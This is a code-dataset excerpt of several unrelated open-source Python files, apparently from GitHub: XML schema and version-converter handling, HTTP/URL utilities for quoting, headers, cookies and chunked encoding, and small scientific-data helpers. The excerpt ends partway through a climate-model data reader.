        # Get nodes that depend on the changed node; if there are none, exit.
        deps = util.findDescendantNode(node.templatenode,['dependentvariables'])
        if deps is None: return
        # Now build a list of the dependant nodes; currently hidden nodes first, currently visible
        # nodes last, so that when we iterate over the list and switch visibilities first extra nodes
        # will appear, and only later some are removed (this prevents unnecessary automatic scrolling in GUI)
        depnodes = []
        for d in util.findDescendantNodes(deps,['dependentvariable']):
            varpath = d.getAttribute('path')
            # Relative paths are resolved against the changed node's parent,
            # absolute paths against the store root.
            if varpath[0]!='/':
                refnode = node.parent
            else:
                refnode = self.root
            varnode = refnode[varpath]
            assert varnode is not None, 'Unable to locate node "%s" at %s.' % (varpath,refnode)
            deptype = d.getAttribute('type')
            if deptype=='visibility':
                # Queue visibility updates: hidden nodes first (see above).
                if varnode.visible:
                    depnodes.append(varnode)
                else:
                    depnodes.insert(0,varnode)
            else:
                # Any other dependency type is forwarded as a change event.
                self.onChange(varnode,deptype)
        for varnode in depnodes: varnode.updateVisibility()
def onBeforeChange(self,node,newvalue):
"""Called internally just before the value of a node changes. The return value
decides if the change is allowed (return True) or denied (return False)."""
for i in self.interfaces:
if i in self.blockedinterfaces: continue
if not i.onBeforeChange(node,newvalue): return False
return True
    def afterStoreChange(self):
        """Called internally after the store changes, i.e., all values have changed."""
        # Block all interfaces up front; each interface is unblocked only after it
        # has handled the event, so callbacks triggered while it is handling the
        # event cannot re-enter it.
        self.blockedinterfaces = set(self.interfaces)
        for i in self.interfaces:
            i.afterStoreChange()
            self.blockedinterfaces.remove(i)
def beforeVisibilityChange(self,node,visible,showhide=True):
"""Called internally before a node is hidden (showhide=True) or deleted (showhide=False)."""
for i in self.interfaces:
if i not in self.blockedinterfaces: i.beforeVisibilityChange(node,visible,showhide)
def afterVisibilityChange(self,node,visible,showhide=True):
"""Called internally after a node is hidden (showhide=True) or deleted (showhide=False)."""
for i in self.interfaces:
if i not in self.blockedinterfaces: i.afterVisibilityChange(node,visible,showhide)
def versionStringToInt(versionstring):
    """Converts a version string to a representative integer.
    Versions may consist of components separated by a dot, e.g., "major.minor.build"
    In that case, individual components cannot exceed 255.
    """
    # Treat the dot-separated components as digits of a base-256 number,
    # most significant component first.
    result = 0
    for component in versionstring.split('.'):
        result = result*256 + int(component)
    return result
class SchemaInfoCache(object):
    """Cache mapping schema directory paths to lazily created SchemaInfo objects."""
    def __init__(self):
        # Maps directory path -> SchemaInfo instance.
        self.path2info = {}
    def __getitem__(self,path):
        # Create the SchemaInfo on first access; afterwards keep serving
        # the same instance for this path.
        info = self.path2info.get(path)
        if info is None:
            info = SchemaInfo(path)
            self.path2info[path] = info
        return info
schemainfocache = SchemaInfoCache()
class SchemaInfo(object):
    """Inventory of the schemas, defaults and converters found in one directory.

    Each category (schemas, converters, defaults) is scanned lazily, the first
    time it is requested.
    """
    def __init__(self,infodir=None):
        assert infodir is None or os.path.isdir(infodir),'SchemaInfo object can only be initialized from a directory, but "%s" is not an existing directory.' % infodir
        # Lazily-filled caches; None means "not scanned yet".
        self.schemas = None
        self.convertorsfrom = None
        self.defaults = None
        self.packagedvaluesnames = None
        self.infodir = infodir
    def getSchemas(self):
        """Returns a dictionary that links schema version strings to paths to the corresponding schema file.
        """
        if self.schemas is None:
            self.schemas = {}
            self.packagedvaluesnames = set()
            if self.infodir is not None: self.addSchemas(self.infodir)
        return self.schemas
    def getPackagedValuesNames(self):
        """Returns the set of file names under which value files may be packaged,
        as declared by the "packagedvaluesname" attribute of the known schemas.
        """
        # Scanning the schemas also fills self.packagedvaluesnames.
        self.getSchemas()
        return self.packagedvaluesnames
    def getConverters(self):
        """Returns information on available converters.
        This information is provided as a dictionary linking each source version to another dictionary
        that links available target versions to the Converter class that can perform the actual
        conversion. Only direct conversions are included.
        """
        if self.convertorsfrom is None:
            self.convertorsfrom = {}
            if self.infodir is not None: self.addConverters(self.infodir)
        return self.convertorsfrom
    def getDefaults(self):
        """Returns a dictionary that links version strings to paths to the corresponding default file.
        """
        if self.defaults is None:
            self.defaults = {}
            if self.infodir is not None: self.addDefaults(self.infodir)
        return self.defaults
    def getConverter(self,sourceid,targetid,directonly=False):
        """Returns a convertor object, capable of converting between the specified versions.
        Conversion routes may be direct (using one convertor object), or indirect (using a
        chain of convertor objects). Specify "directonly" to retrieve only direct conversion
        routes. Return None if no convertor is available that meets the specified criteria.
        """
        # Try direct route first.
        if (sourceid in self.getConverters()) and (targetid in self.getConverters()[sourceid]):
            return self.getConverters()[sourceid][targetid]()
        # Direct route not available, try indirect routes
        if not directonly:
            indirectroutes = self.findIndirectConversion(sourceid,targetid,depth=' ')
            if len(indirectroutes)>0:
                # Prefer the shortest route and build a chain of direct converters.
                indirectroutes.sort(key=len)
                route = indirectroutes[0]
                chain = []
                for istep in range(len(route)-1):
                    convertor = self.getConverter(route[istep],route[istep+1],directonly=True)
                    chain.append(convertor)
                return versioning.ConvertorChain(chain)
        # No route available.
        return None
    def findIndirectConversion(self,sourceid,targetid,disallowed=[],depth=''):
        """Returns all conversion routes between the specified source version and target
        version. Use of intermediate versions specified in "disallowed" will be avoided
        (this is used specifically for prevention of circular conversion routes). The
        depth argument is used for debugging output only."""
        next = self.getConverters().get(sourceid,{}).keys()
        routes = []
        # Never revisit the current version further down this route.
        curdisallowed = disallowed[:]+[sourceid]
        for curnext in next:
            if curnext in curdisallowed: continue
            if curnext==targetid:
                # One more step reaches the target: complete route found.
                routes.append([sourceid,curnext])
            else:
                # Recurse: find routes from the intermediate version to the target.
                childroutes = self.findIndirectConversion(curnext,targetid,curdisallowed,depth=depth+' ')
                for cr in childroutes:
                    routes.append([sourceid]+cr)
        return routes
    def addSchemas(self,dirpath):
        # Scan dirpath for .schema files and register them by their version attribute.
        assert os.path.isdir(dirpath),'Provided path "%s" must be a directory.' % dirpath
        for name in os.listdir(dirpath):
            fullpath = os.path.join(dirpath,name)
            if os.path.isfile(fullpath):
                (basename,ext) = os.path.splitext(name)
                if ext=='.schema':
                    rootname,rootattr = util.getRootNodeInfo(fullpath)
                    self.getSchemas()[rootattr.get('version','')] = fullpath
                    # Also remember the file name under which values are packaged.
                    self.packagedvaluesnames.add(rootattr.get('packagedvaluesname','values.xml'))
                    #self.getSchemas()[basename] = fullpath
    def addConverters(self,dirpath):
        # Scan dirpath for .converter files and register the converters they define.
        assert os.path.isdir(dirpath),'Provided path "%s" must be a directory.' % dirpath
        #print 'Adding converters from "%s".' % dirpath
        for name in os.listdir(dirpath):
            fullpath = os.path.join(dirpath,name)
            if name.endswith('.converter') and os.path.isfile(fullpath):
                self.addConverterFromXml(fullpath)
    def addDefaults(self,dirpath):
        # Scan dirpath for .defaults files and register them by their version attribute.
        assert os.path.isdir(dirpath),'Provided path "%s" must be a directory.' % dirpath
        for name in os.listdir(dirpath):
            fullpath = os.path.join(dirpath,name)
            if os.path.isfile(fullpath) and fullpath.endswith('.defaults'):
                rootname,rootattr = util.getRootNodeInfo(fullpath)
                self.getDefaults()[rootattr.get('version','')] = fullpath
    def addConverterFromXml(self,xmlpath):
        # Build forward (and optional backward) converter classes from an XML description.
        fw,bw = versioning.XmlConvertor.createClasses(xmlpath)
        self.addConverter(fw)
        if bw is not None: self.addConverter(bw)
    def addConverter(self,convertorclass):
        """Registers the specified convertor class. The source and target version that
        the convertor supports are part of the convertor class supplied, and are therefore
        not specified explicitly.
        """
        sourceid = convertorclass.fixedsourceid
        targetid = convertorclass.fixedtargetid
        assert sourceid is not None, 'Error! Specified convertor class lacks a source identifier.'
        assert targetid is not None, 'Error! Specified convertor class lacks a target identifier.'
        source2target = self.getConverters().setdefault(sourceid,{})
        assert targetid not in source2target, 'Error! A class for converting from "%s" to "%s" was already specified previously.' % (sourceid,targetid)
        source2target[targetid] = convertorclass
    def hasConverter(self,sourceid,targetid):
        """Checks if a conversion route between the specified versions is available.
        Both direct and indirect (via another version) routes are ok.
        """
        return self.getConverter(sourceid,targetid) is not None
| BoldingBruggeman/gotm | gui.py/xmlstore/xmlstore.py | Python | gpl-2.0 | 127,433 |
import os
import re
import string
import mimetypes
from hashlib import sha1, md5
from uuid import uuid4
from io import BytesIO
from urllib import request as urllibr
from http import client as httpclient
from urllib.parse import quote, splitport
from http.cookiejar import CookieJar, Cookie
from http.cookies import SimpleCookie
from .structures import mapping_iterator
from .string import to_bytes, to_string
# Convenience re-exports so users of this module need not touch urllib directly.
getproxies_environment = urllibr.getproxies_environment
ascii_letters = string.ascii_letters
HTTPError = urllibr.HTTPError
URLError = urllibr.URLError
parse_http_list = urllibr.parse_http_list
# Schemes secured with TLS.
tls_schemes = ('https', 'wss')
# ################################################### URI & IRI STUFF
#
# The reserved URI characters (RFC 3986 - section 2.2)
# The default charset is "iso-8859-1" (latin-1) from section 3.7.1
# http://www.ietf.org/rfc/rfc2616.txt
CHARSET = 'ISO-8859-1'
URI_GEN_DELIMS = frozenset(':/?#[]@')
URI_SUB_DELIMS = frozenset("!$&'()*+,;=")
URI_RESERVED_SET = URI_GEN_DELIMS.union(URI_SUB_DELIMS)
URI_RESERVED_CHARS = ''.join(URI_RESERVED_SET)
# The unreserved URI characters (RFC 3986 - section 2.3)
URI_UNRESERVED_SET = frozenset(ascii_letters + string.digits + '-._~')
URI_SAFE_CHARS = URI_RESERVED_CHARS + '%~'
# Characters allowed in an HTTP header token.
HEADER_TOKEN_CHARS = frozenset("!#$%&'*+-.0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                               '^_`abcdefghijklmnopqrstuvwxyz|~')
# Largest data chunk emitted by http_chunks (chunked transfer encoding).
MAX_CHUNK_SIZE = 65536
# ################################################### CONTENT TYPES
JSON_CONTENT_TYPES = ('application/json',
                      'application/javascript',
                      'text/json',
                      'text/x-json')
# ################################################### REQUEST METHODS
GET = 'GET'
DELETE = 'DELETE'
HEAD = 'HEAD'
OPTIONS = 'OPTIONS'
PATCH = 'PATCH'
POST = 'POST'
PUT = 'PUT'
TRACE = 'TRACE'
# Methods whose parameters go into the URL versus into the request body.
ENCODE_URL_METHODS = frozenset((DELETE, GET, HEAD, OPTIONS))
ENCODE_BODY_METHODS = frozenset((PATCH, POST, PUT, TRACE))
REDIRECT_CODES = (301, 302, 303, 305, 307)
# Status codes whose responses carry no body.
NO_CONTENT_CODES = frozenset((204, 304))
CRLF = '\r\n'
LWS = '\r\n '
SEP = ': '
def escape(s):
    """Percent-encode *s*, leaving only RFC 3986 unreserved characters intact."""
    encoded = quote(s, safe='~')
    return encoded
def urlquote(iri):
    # Percent-encode *iri* while keeping all RFC 3986 reserved characters as-is.
    return quote(iri, safe=URI_RESERVED_CHARS)
def _gen_unquote(uri):
    """Yield pieces of *uri* with %XX escapes of unreserved characters decoded.

    Escapes of reserved or non-unreserved characters are passed through
    untouched (still percent-encoded).
    """
    unreserved = URI_UNRESERVED_SET
    pieces = to_string(uri, 'latin1').split('%')
    # The first piece precedes any escape and is emitted verbatim.
    yield pieces[0]
    for piece in pieces[1:]:
        hexpart = piece[:2]
        if len(hexpart) == 2:
            char = chr(int(hexpart, 16))
            # Only decode when the result is an unreserved character.
            if char in unreserved:
                yield char + piece[2:]
                continue
        yield '%' + piece
def unquote_unreserved(uri):
    """Un-escape any percent-escape sequences in a URI that are unreserved
    characters. This leaves all reserved, illegal and non-ASCII bytes encoded."""
    # _gen_unquote yields the URI in already-decoded pieces; just join them.
    return ''.join(_gen_unquote(uri))
def requote_uri(uri):
    """Re-quote the given URI.
    This function passes the given URI through an unquote/quote cycle to
    ensure that it is fully and consistently quoted.
    """
    # Unquote only the unreserved characters
    # Then quote only illegal characters (do not quote reserved, unreserved,
    # or '%')
    return quote(unquote_unreserved(uri), safe=URI_SAFE_CHARS)
def iri_to_uri(iri, kwargs=None):
    '''Convert an Internationalised Resource Identifier (IRI) portion
    to a URI portion that is suitable for inclusion in a URL.
    This is the algorithm from section 3.1 of RFC 3987.
    Returns an ASCII native string containing the encoded result.
    '''
    if iri is None:
        return iri
    if kwargs:
        # Append the key/value pairs as a query string before quoting.
        query = '&'.join('%s=%s' % item for item in kwargs.items())
        iri = '%s?%s' % (to_string(iri, 'latin1'), query)
    return urlquote(unquote_unreserved(iri))
def host_and_port(host):
    """Split *host* into a ``(host, port)`` pair; port is an int or ``None``."""
    name, port = splitport(host)
    return name, int(port) if port else None
def default_port(scheme):
    """Default port (as a string) for *scheme*; ``None`` for unknown schemes."""
    return {'http': '80', 'ws': '80',
            'https': '443', 'wss': '443'}.get(scheme)
def host_and_port_default(scheme, host):
    """Split *host* into ``(host, port)`` (both strings), substituting the
    scheme's default port when none is present."""
    name, port = splitport(host)
    return name, port or default_port(scheme)
def host_no_default_port(scheme, netloc):
    """Return *netloc* with its port stripped if that port is the scheme's default."""
    host, port = splitport(netloc)
    # Keep the netloc unchanged unless the port is redundant.
    return host if port and port == default_port(scheme) else netloc
def get_hostport(scheme, full_host):
    # Resolve *full_host* (possibly "host:port") into a (host, port) tuple,
    # falling back to the scheme's default port and validating the port number.
    host, port = host_and_port(full_host)
    if port is None:
        # splitport found no usable port: parse manually so that an empty
        # port ("http://foo.com:/") falls back to the scheme default.
        i = host.rfind(':')
        j = host.rfind(']')         # ipv6 addresses have [...]
        if i > j:
            try:
                port = int(host[i+1:])
            except ValueError:
                if host[i+1:] == "":  # http://foo.com:/ == http://foo.com/
                    port = default_port(scheme)
                else:
                    raise httpclient.InvalidURL("nonnumeric port: '%s'"
                                                % host[i+1:])
            host = host[:i]
        else:
            port = default_port(scheme)
    if host and host[0] == '[' and host[-1] == ']':
        # Strip the brackets from an IPv6 literal.
        host = host[1:-1]
    return host, int(port)
def remove_double_slash(route):
    """Collapse every run of consecutive slashes in *route* into a single slash."""
    if '//' not in route:
        return route
    return re.sub('/+', '/', route)
def is_succesful(status):
    '''True when *status* is a 2xx (successful) HTTP status code.'''
    return 200 <= status < 300
def split_comma(value):
    """Split *value* on commas, trimming whitespace and dropping empty items."""
    stripped = (part.strip() for part in value.split(','))
    return [part for part in stripped if part]
def parse_cookies(value):
    """Parse a Cookie header *value* into a list of ``name=value`` strings."""
    cookies = SimpleCookie(value)
    return [morsel.OutputString() for morsel in cookies.values()]
# Maps header names to the parser used to split their raw value into a list.
header_parsers = {'Connection': split_comma,
                  'Cookie': parse_cookies}
def quote_header_value(value, extra_chars='', allow_token=True):
    """Quote a header value if necessary.
    :param value: the value to quote.
    :param extra_chars: a list of extra characters to skip quoting.
    :param allow_token: if this is enabled token values are returned
        unchanged.
    """
    value = to_string(value)
    # Pure tokens need no quoting at all.
    if allow_token and set(value).issubset(HEADER_TOKEN_CHARS | set(extra_chars)):
        return value
    escaped = value.replace('\\', '\\\\').replace('"', '\\"')
    return '"%s"' % escaped
def unquote_header_value(value, is_filename=False):
    """Unquotes a header value.
    Reversal of :func:`quote_header_value`. This does not use the real
    un-quoting but what browsers are actually using for quoting.
    :param value: the header value to unquote.
    """
    if not (value and value[0] == value[-1] == '"'):
        return value
    # Strip the surrounding quotes only. Full RFC unquoting would break with
    # Internet Explorer and some other browsers, which e.g. upload files
    # with "C:\foo\bar.txt" as the filename.
    inner = value[1:-1]
    # A filename that starts like a UNC path is returned verbatim: collapsing
    # the escapes would turn the leading double slash into a single one.
    if is_filename and inner[:2] == '\\\\':
        return inner
    return inner.replace('\\\\', '\\').replace('\\"', '"')
def parse_dict_header(value):
    """Parse lists of key, value pairs as described by RFC 2068 Section 2 and
    convert them into a python dict:
    >>> d = parse_dict_header('foo="is a fish", bar="as well"')
    >>> type(d) is dict
    True
    >>> sorted(d.items())
    [('bar', 'as well'), ('foo', 'is a fish')]
    If there is no value for a key it will be `None`:
    >>> parse_dict_header('key_without_value')
    {'key_without_value': None}
    To create a header from the :class:`dict` again, use the
    :func:`dump_header` function.
    :param value: a string with a dict header.
    :return: :class:`dict`
    """
    result = {}
    for item in parse_http_list(value):
        name, sep, val = item.partition('=')
        if not sep:
            # A key without a value maps to None.
            result[item] = None
        else:
            if val[:1] == val[-1:] == '"':
                val = unquote_header_value(val[1:-1])
            result[name] = val
    return result
_special = re.escape('()<>@,;:\\"/[]?={} \t')
_re_special = re.compile('[%s]' % _special)
_qstr = '"(?:\\\\.|[^"])*"' # Quoted string
_value = '(?:[^%s]+|%s)' % (_special, _qstr) # Save or quoted string
_option = '(?:;|^)\s*([^%s]+)\s*=\s*(%s)' % (_special, _value)
_re_option = re.compile(_option) # key=value part of an Content-Type header
def header_unquote(val, filename=False):
    """Remove surrounding double quotes from a header parameter value and
    collapse backslash escapes.

    :param val: raw parameter value, possibly surrounded by double quotes.
    :param filename: when True, a quoted value that looks like a Windows
        drive or UNC path is reduced to its last path component (works
        around the IE6 bug of sending the client's full file path as the
        filename).
    """
    if val[0] == val[-1] == '"':
        val = val[1:-1]
        # Only apply the path heuristic to filename parameters; other quoted
        # values may legitimately contain ':\\' sequences. (The original code
        # accepted the "filename" flag but never consulted it.)
        if filename and (val[1:3] == ':\\' or val[:2] == '\\\\'):
            val = val.split('\\')[-1]  # fix ie6 bug: full path --> filename
        return val.replace('\\\\', '\\').replace('\\"', '"')
    return val
def parse_options_header(header, options=None):
    """Split a header such as Content-Type into its main value and an
    option dict (e.g. charset, filename)."""
    if ';' not in header:
        # No parameters at all: normalised value, empty options.
        return header.lower().strip(), {}
    ctype, rest = header.split(';', 1)
    options = options or {}
    for match in _re_option.finditer(rest):
        key = match.group(1).lower()
        # Filenames get the IE path work-around in header_unquote.
        options[key] = header_unquote(match.group(2), key == 'filename')
    return ctype, options
# ############################################ UTILITIES, ENCODERS, PARSERS
# Matches locations beginning with an http:// or https:// scheme (any case).
absolute_http_url_re = re.compile(r"^https?://", re.I)


def is_absolute_uri(location):
    '''Check if a ``location`` is absolute, i.e. it includes the scheme
    '''
    if not location:
        return location
    return absolute_http_url_re.match(location)
def get_environ_proxies():
    """Return a dict of environment proxies. From requests_."""
    keys = ('all', 'http', 'https', 'ftp', 'socks', 'ws', 'wss', 'no')

    def lookup(name):
        # The lower-case variable wins over the upper-case one.
        return os.environ.get(name) or os.environ.get(name.upper())

    proxies = {}
    for key in keys:
        value = lookup('%s_proxy' % key)
        if value:
            proxies[key] = value
    return proxies
def appendslash(url):
    '''Append a slash to *url* if it does not have one.'''
    return url if url.endswith('/') else '%s/' % url
def choose_boundary():
    """Our embarassingly-simple replacement for mimetools.choose_boundary."""
    boundary = uuid4()
    return boundary.hex
def get_content_type(filename):
    """Best-guess MIME type for *filename*, defaulting to octet-stream."""
    guessed, _ = mimetypes.guess_type(filename)
    return guessed or 'application/octet-stream'
def encode_multipart_formdata(fields, boundary=None, charset=None):
    """Encode a dictionary of ``fields`` using the multipart/form-data format.
    :param fields:
        Dictionary of fields or list of (key, value) field tuples. The key is
        treated as the field name, and the value as the body of the form-data
        bytes. If the value is a tuple of two elements, then the first element
        is treated as the filename of the form-data section.
        Field names and filenames must be unicode.
    :param boundary:
        If not specified, then a random boundary will be generated using
        :func:`mimetools.choose_boundary`.
    :param charset:
        Charset used to encode the boundary markers and part headers
        (defaults to utf-8).
    :return: tuple of (encoded body bytes, Content-Type header value).
    """
    charset = charset or 'utf-8'
    body = BytesIO()
    if boundary is None:
        boundary = choose_boundary()
    for fieldname, value in mapping_iterator(fields):
        # Every part begins with a boundary marker.
        body.write(('--%s\r\n' % boundary).encode(charset))
        if isinstance(value, tuple):
            # (filename, data) pair: emit a file part with a guessed MIME type.
            filename, data = value
            body.write(('Content-Disposition: form-data; name="%s"; '
                        'filename="%s"\r\n' % (fieldname, filename))
                       .encode(charset))
            body.write(('Content-Type: %s\r\n\r\n' %
                        (get_content_type(filename))).encode(charset))
        else:
            # Plain field: emitted as text/plain.
            data = value
            body.write(('Content-Disposition: form-data; name="%s"\r\n'
                        % (fieldname)).encode(charset))
            body.write(b'Content-Type: text/plain\r\n\r\n')
        body.write(to_bytes(data))
        body.write(b'\r\n')
    # The closing boundary marks the end of the form data.
    body.write(('--%s--\r\n' % (boundary)).encode(charset))
    content_type = 'multipart/form-data; boundary=%s' % boundary
    return body.getvalue(), content_type
def hexmd5(x):
    """Hex digest of the MD5 hash of *x* (converted to bytes first)."""
    digest = md5(to_bytes(x))
    return digest.hexdigest()
def hexsha1(x):
    """Hex digest of the SHA-1 hash of *x* (converted to bytes first)."""
    digest = sha1(to_bytes(x))
    return digest.hexdigest()
# ################################################################# COOKIES
def create_cookie(name, value, **kwargs):
    """Make a cookie from underspecified parameters.
    By default, the pair of `name` and `value` will be set for the domain ''
    and sent on every request (this is sometimes called a "supercookie").
    """
    spec = {
        'version': 0,
        'name': name,
        'value': value,
        'port': None,
        'domain': '',
        'path': '/',
        'secure': False,
        'expires': None,
        'discard': True,
        'comment': None,
        'comment_url': None,
        'rest': {'HttpOnly': None},
        'rfc2109': False,
    }
    unknown = set(kwargs) - set(spec)
    if unknown:
        raise TypeError('create_cookie() got unexpected keyword arguments: %s'
                        % list(unknown))
    spec.update(kwargs)
    # The *_specified flags tell CookieJar whether each field was explicit.
    spec['port_specified'] = bool(spec['port'])
    spec['domain_specified'] = bool(spec['domain'])
    spec['domain_initial_dot'] = spec['domain'].startswith('.')
    spec['path_specified'] = bool(spec['path'])
    return Cookie(**spec)
def cookiejar_from_dict(*cookie_dicts):
"""Returns a CookieJar from a key/value dictionary.
:param cookie_dict: Dict of key/values to insert into CookieJar.
"""
cookie_dicts = tuple((d for d in cookie_dicts if d))
if len(cookie_dicts) == 1 and isinstance(cookie_dicts[0], CookieJar):
return cookie_dicts[0]
cookiejar = CookieJar()
for cookie_dict in cookie_dicts:
if isinstance(cookie_dict, CookieJar):
for cookie in cookie_dict:
cookiejar.set_cookie(cookie)
else:
for name in cookie_dict:
cookiejar.set_cookie(create_cookie(name, cookie_dict[name]))
return cookiejar
# ################################################################# VARY HEADER
# Splits comma-delimited header values, tolerating surrounding whitespace.
cc_delim_re = re.compile(r'\s*,\s*')


def patch_vary_headers(response, newheaders):
    """Adds (or updates) the "Vary" header in the given HttpResponse object.
    newheaders is a list of header names that should be in "Vary". Existing
    headers in "Vary" aren't removed.
    For information on the Vary header, see:
    http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.44
    """
    # Preserve the original ordering: caches may hash the Vary value as-is.
    vary = cc_delim_re.split(response['Vary']) if 'Vary' in response else []
    # Header names are case-insensitive, so compare lower-cased.
    present = set(header.lower() for header in vary)
    vary.extend(header for header in newheaders
                if header.lower() not in present)
    response['Vary'] = ', '.join(vary)
def has_vary_header(response, header_query):
    """
    Checks to see if the response has a given header name in its Vary header.
    """
    if not response.has_header('Vary'):
        return False
    # Compare case-insensitively, as header names are case-insensitive.
    present = set(header.lower()
                  for header in cc_delim_re.split(response['Vary']))
    return header_query.lower() in present
class CacheControl:
    '''Helper that writes ``cache-control`` directives into a headers object.

    Background: http://www.mnot.net/cache_docs/

    .. attribute:: maxage

        Specifies the maximum amount of time that a representation will be
        considered fresh.
    '''
    def __init__(self, maxage=None, private=False,
                 must_revalidate=False, proxy_revalidate=False,
                 nostore=False):
        self.maxage = maxage
        self.private = private
        self.must_revalidate = must_revalidate
        self.proxy_revalidate = proxy_revalidate
        self.nostore = nostore

    def __call__(self, headers, etag=None):
        """Populate ``headers`` with cache directives and return it.

        ``headers`` must support item assignment and an ``add(key, value)``
        method for appending additional cache-control tokens.
        """
        if self.nostore:
            # Strongest setting: forbid caching entirely.
            headers['cache-control'] = ('no-store, no-cache, must-revalidate,'
                                        ' max-age=0')
            return headers
        if not self.maxage:
            # No freshness lifetime configured: force revalidation.
            headers['cache-control'] = 'no-cache'
            return headers
        headers['cache-control'] = 'max-age=%s' % self.maxage
        if etag:
            headers['etag'] = '"%s"' % etag
        headers.add('cache-control', 'private' if self.private else 'public')
        if self.must_revalidate:
            headers.add('cache-control', 'must-revalidate')
        elif self.proxy_revalidate:
            headers.add('cache-control', 'proxy-revalidate')
        return headers
def chunk_encoding(chunk):
    '''Encode ``chunk`` (bytes) in HTTP/1.1 chunked transfer format::

        chunk-size(hex) CRLF
        chunk-data CRLF

    An empty chunk therefore yields ``0 CRLF CRLF``, which is the
    terminating last-chunk of a chunked body.
    '''
    size_line = '%X\r\n' % len(chunk)
    return size_line.encode('utf-8') + chunk + b'\r\n'
def http_chunks(data, finish=False):
    """Yield ``data`` as HTTP/1.1 encoded chunks.

    ``data`` is split into pieces of at most ``MAX_CHUNK_SIZE`` bytes,
    each encoded with :func:`chunk_encoding`.  When ``finish`` is True,
    the zero-length terminating last-chunk is appended as required by
    RFC 7230 section 4.1.
    """
    while len(data) >= MAX_CHUNK_SIZE:
        chunk, data = data[:MAX_CHUNK_SIZE], data[MAX_CHUNK_SIZE:]
        yield chunk_encoding(chunk)
    if data:
        yield chunk_encoding(data)
    if finish:
        # BUG FIX: previously this yielded ``chunk_encoding(data)``,
        # re-emitting the trailing data chunk instead of the zero-length
        # terminator whenever data was non-empty.  ``data[:0]`` is an
        # empty slice of the same type (bytes), producing ``0\r\n\r\n``.
        yield chunk_encoding(data[:0])
def parse_header_links(value):
    """Return a list of dicts parsed from a Link header value.

    i.e. Link: <http:/.../front.jpeg>; rel=front; type="image/jpeg",
    <http://.../back.jpeg>; rel=back;type="image/jpeg"

    Original code from https://github.com/kennethreitz/requests
    Copyright 2016 Kenneth Reitz
    """
    links = []
    strip_chars = " '\""
    for segment in re.split(", *<", value):
        if ";" in segment:
            url, raw_params = segment.split(";", 1)
        else:
            url, raw_params = segment, ''
        link = {"url": url.strip("<> '\"")}
        for param in raw_params.split(";"):
            parts = param.split("=")
            if len(parts) != 2:
                # Malformed parameter (no '=' or several): stop processing
                # params for this link, mirroring the try/except ValueError
                # unpacking behaviour of the original implementation.
                break
            key, val = parts
            link[key.strip(strip_chars)] = val.strip(strip_chars)
        links.append(link)
    return links
| quantmind/pulsar | pulsar/utils/httpurl.py | Python | bsd-3-clause | 18,331 |
# Copyright 2008-2009 Dan Collins
#
#
# This is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# And is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Build; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import os
from numpy import size,unique
from pdf2py import header
def run():
    """Return the names of the database sub-directories below ``$vistadir``.

    Reads the ``STAGE``, ``HOME`` and ``vistadir`` environment variables
    (``STAGE`` and ``HOME`` are read only so that a missing environment
    fails early with a KeyError) and returns the immediate
    sub-directory names of ``vistadir``.
    """
    stage = os.environ['STAGE']
    home = os.environ['HOME']
    vistadir = os.environ['vistadir']
    #path = stage+'/data/'
    walker = os.walk(vistadir + '/')
    # BUG FIX: ``walker.next()`` is Python-2-only; the ``next()`` builtin
    # works on both Python 2.6+ and Python 3.  Element [1] of the first
    # walk tuple is the list of directory names in vistadir itself.
    dbdirs = next(walker)[1]
    return dbdirs
| badbytes/pymeg | mswtools/vistadbscan.py | Python | gpl-3.0 | 1,005 |
#!/usr/bin/env python3
"""
Created on 10 Dec 2019
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)

Manual / visual test for Str.collection(..): renders a dict, a list, a
tuple and a nested mixed structure to stdout, with "-" separator lines
between the cases.
"""
from scs_core.data.str import Str
# --------------------------------------------------------------------------------------------------------------------
# case 1: flat dict
value = {"a": 1, "b": 2}
print(Str.collection(value))
print("-")
# case 2: flat list
value = [1, 2, 3]
print(Str.collection(value))
print("-")
# case 3: flat tuple
value = (1, 2, 3)
print(Str.collection(value))
print("-")
# case 4: nested mix -- a list containing a dict whose values nest
# further lists and dicts
value = [1, {"a": 1, "b": [1, {"a": 1, "b": 2}, 3]}, 3]
print(Str.collection(value))
| south-coast-science/scs_core | tests/data/datum_format_test.py | Python | mit | 541 |
# -*- coding: utf-8 -*-
#
# © 2014 Ian Eure
# Author: Ian Eure <ian.eure@gmail.com>
#
| ieure/yar | yar/devices/__init__.py | Python | bsd-3-clause | 87 |
# -*- coding: utf-8 -*-
"""
This file is part of pyCMBS.
(c) 2012- Alexander Loew
For COPYING and LICENSE details, please refer to the LICENSE file
"""
from cdo import Cdo
from pycmbs.data import Data
import tempfile as tempfile
import copy
import glob
import os
import sys
import numpy as np
from pycmbs.benchmarking import preprocessor
from pycmbs.benchmarking.utils import get_T63_landseamask, get_temporary_directory
from pycmbs.benchmarking.models.model_basic import *
class JSBACH_BOT(Model):
    # Reader for MPI-ESM (ECHAM6/JSBACH) "BOT" stream output that was
    # already postprocessed to monthly means.
    # NOTE(review): Python 2 style code (print statements); helper names
    # such as ``pyCDO`` and ``pl`` are expected to come from the star
    # import of model_basic at module level -- confirm.
    def __init__(self, filename, dic_variables, experiment, name='', shift_lon=False, **kwargs):
        """
        Parameters
        ----------
        filename : str
            filename (or pattern) handed on to the base Model class
        dic_variables : dict
            maps variable identifiers to data access routine names
        experiment : str
            experiment label; used to construct the input filenames
        name : str
            model name
        shift_lon : bool
            if True, shift longitudes when reading data
        """
        super(JSBACH_BOT, self).__init__(filename, dic_variables, name=name, **kwargs)
        self.experiment = experiment
        self.shift_lon = shift_lon
        self.type = 'JSBACH_BOT'
        self._unique_name = self._get_unique_name()
    def _get_unique_name(self):
        """
        get unique name from model and experiment
        @return: string with unique combination of models and experiment
        """
        return self.name.replace(' ', '') + '-' + self.experiment.replace(' ', '')
    def get_albedo_data(self, interval='season'):
        """
        get albedo data for JSBACH
        returns Data object (seasonal climatology, land points only)
        """
        if interval != 'season':
            raise ValueError('Other temporal sampling than SEASON not supported yet for JSBACH BOT files, sorry')
        v = 'var176'
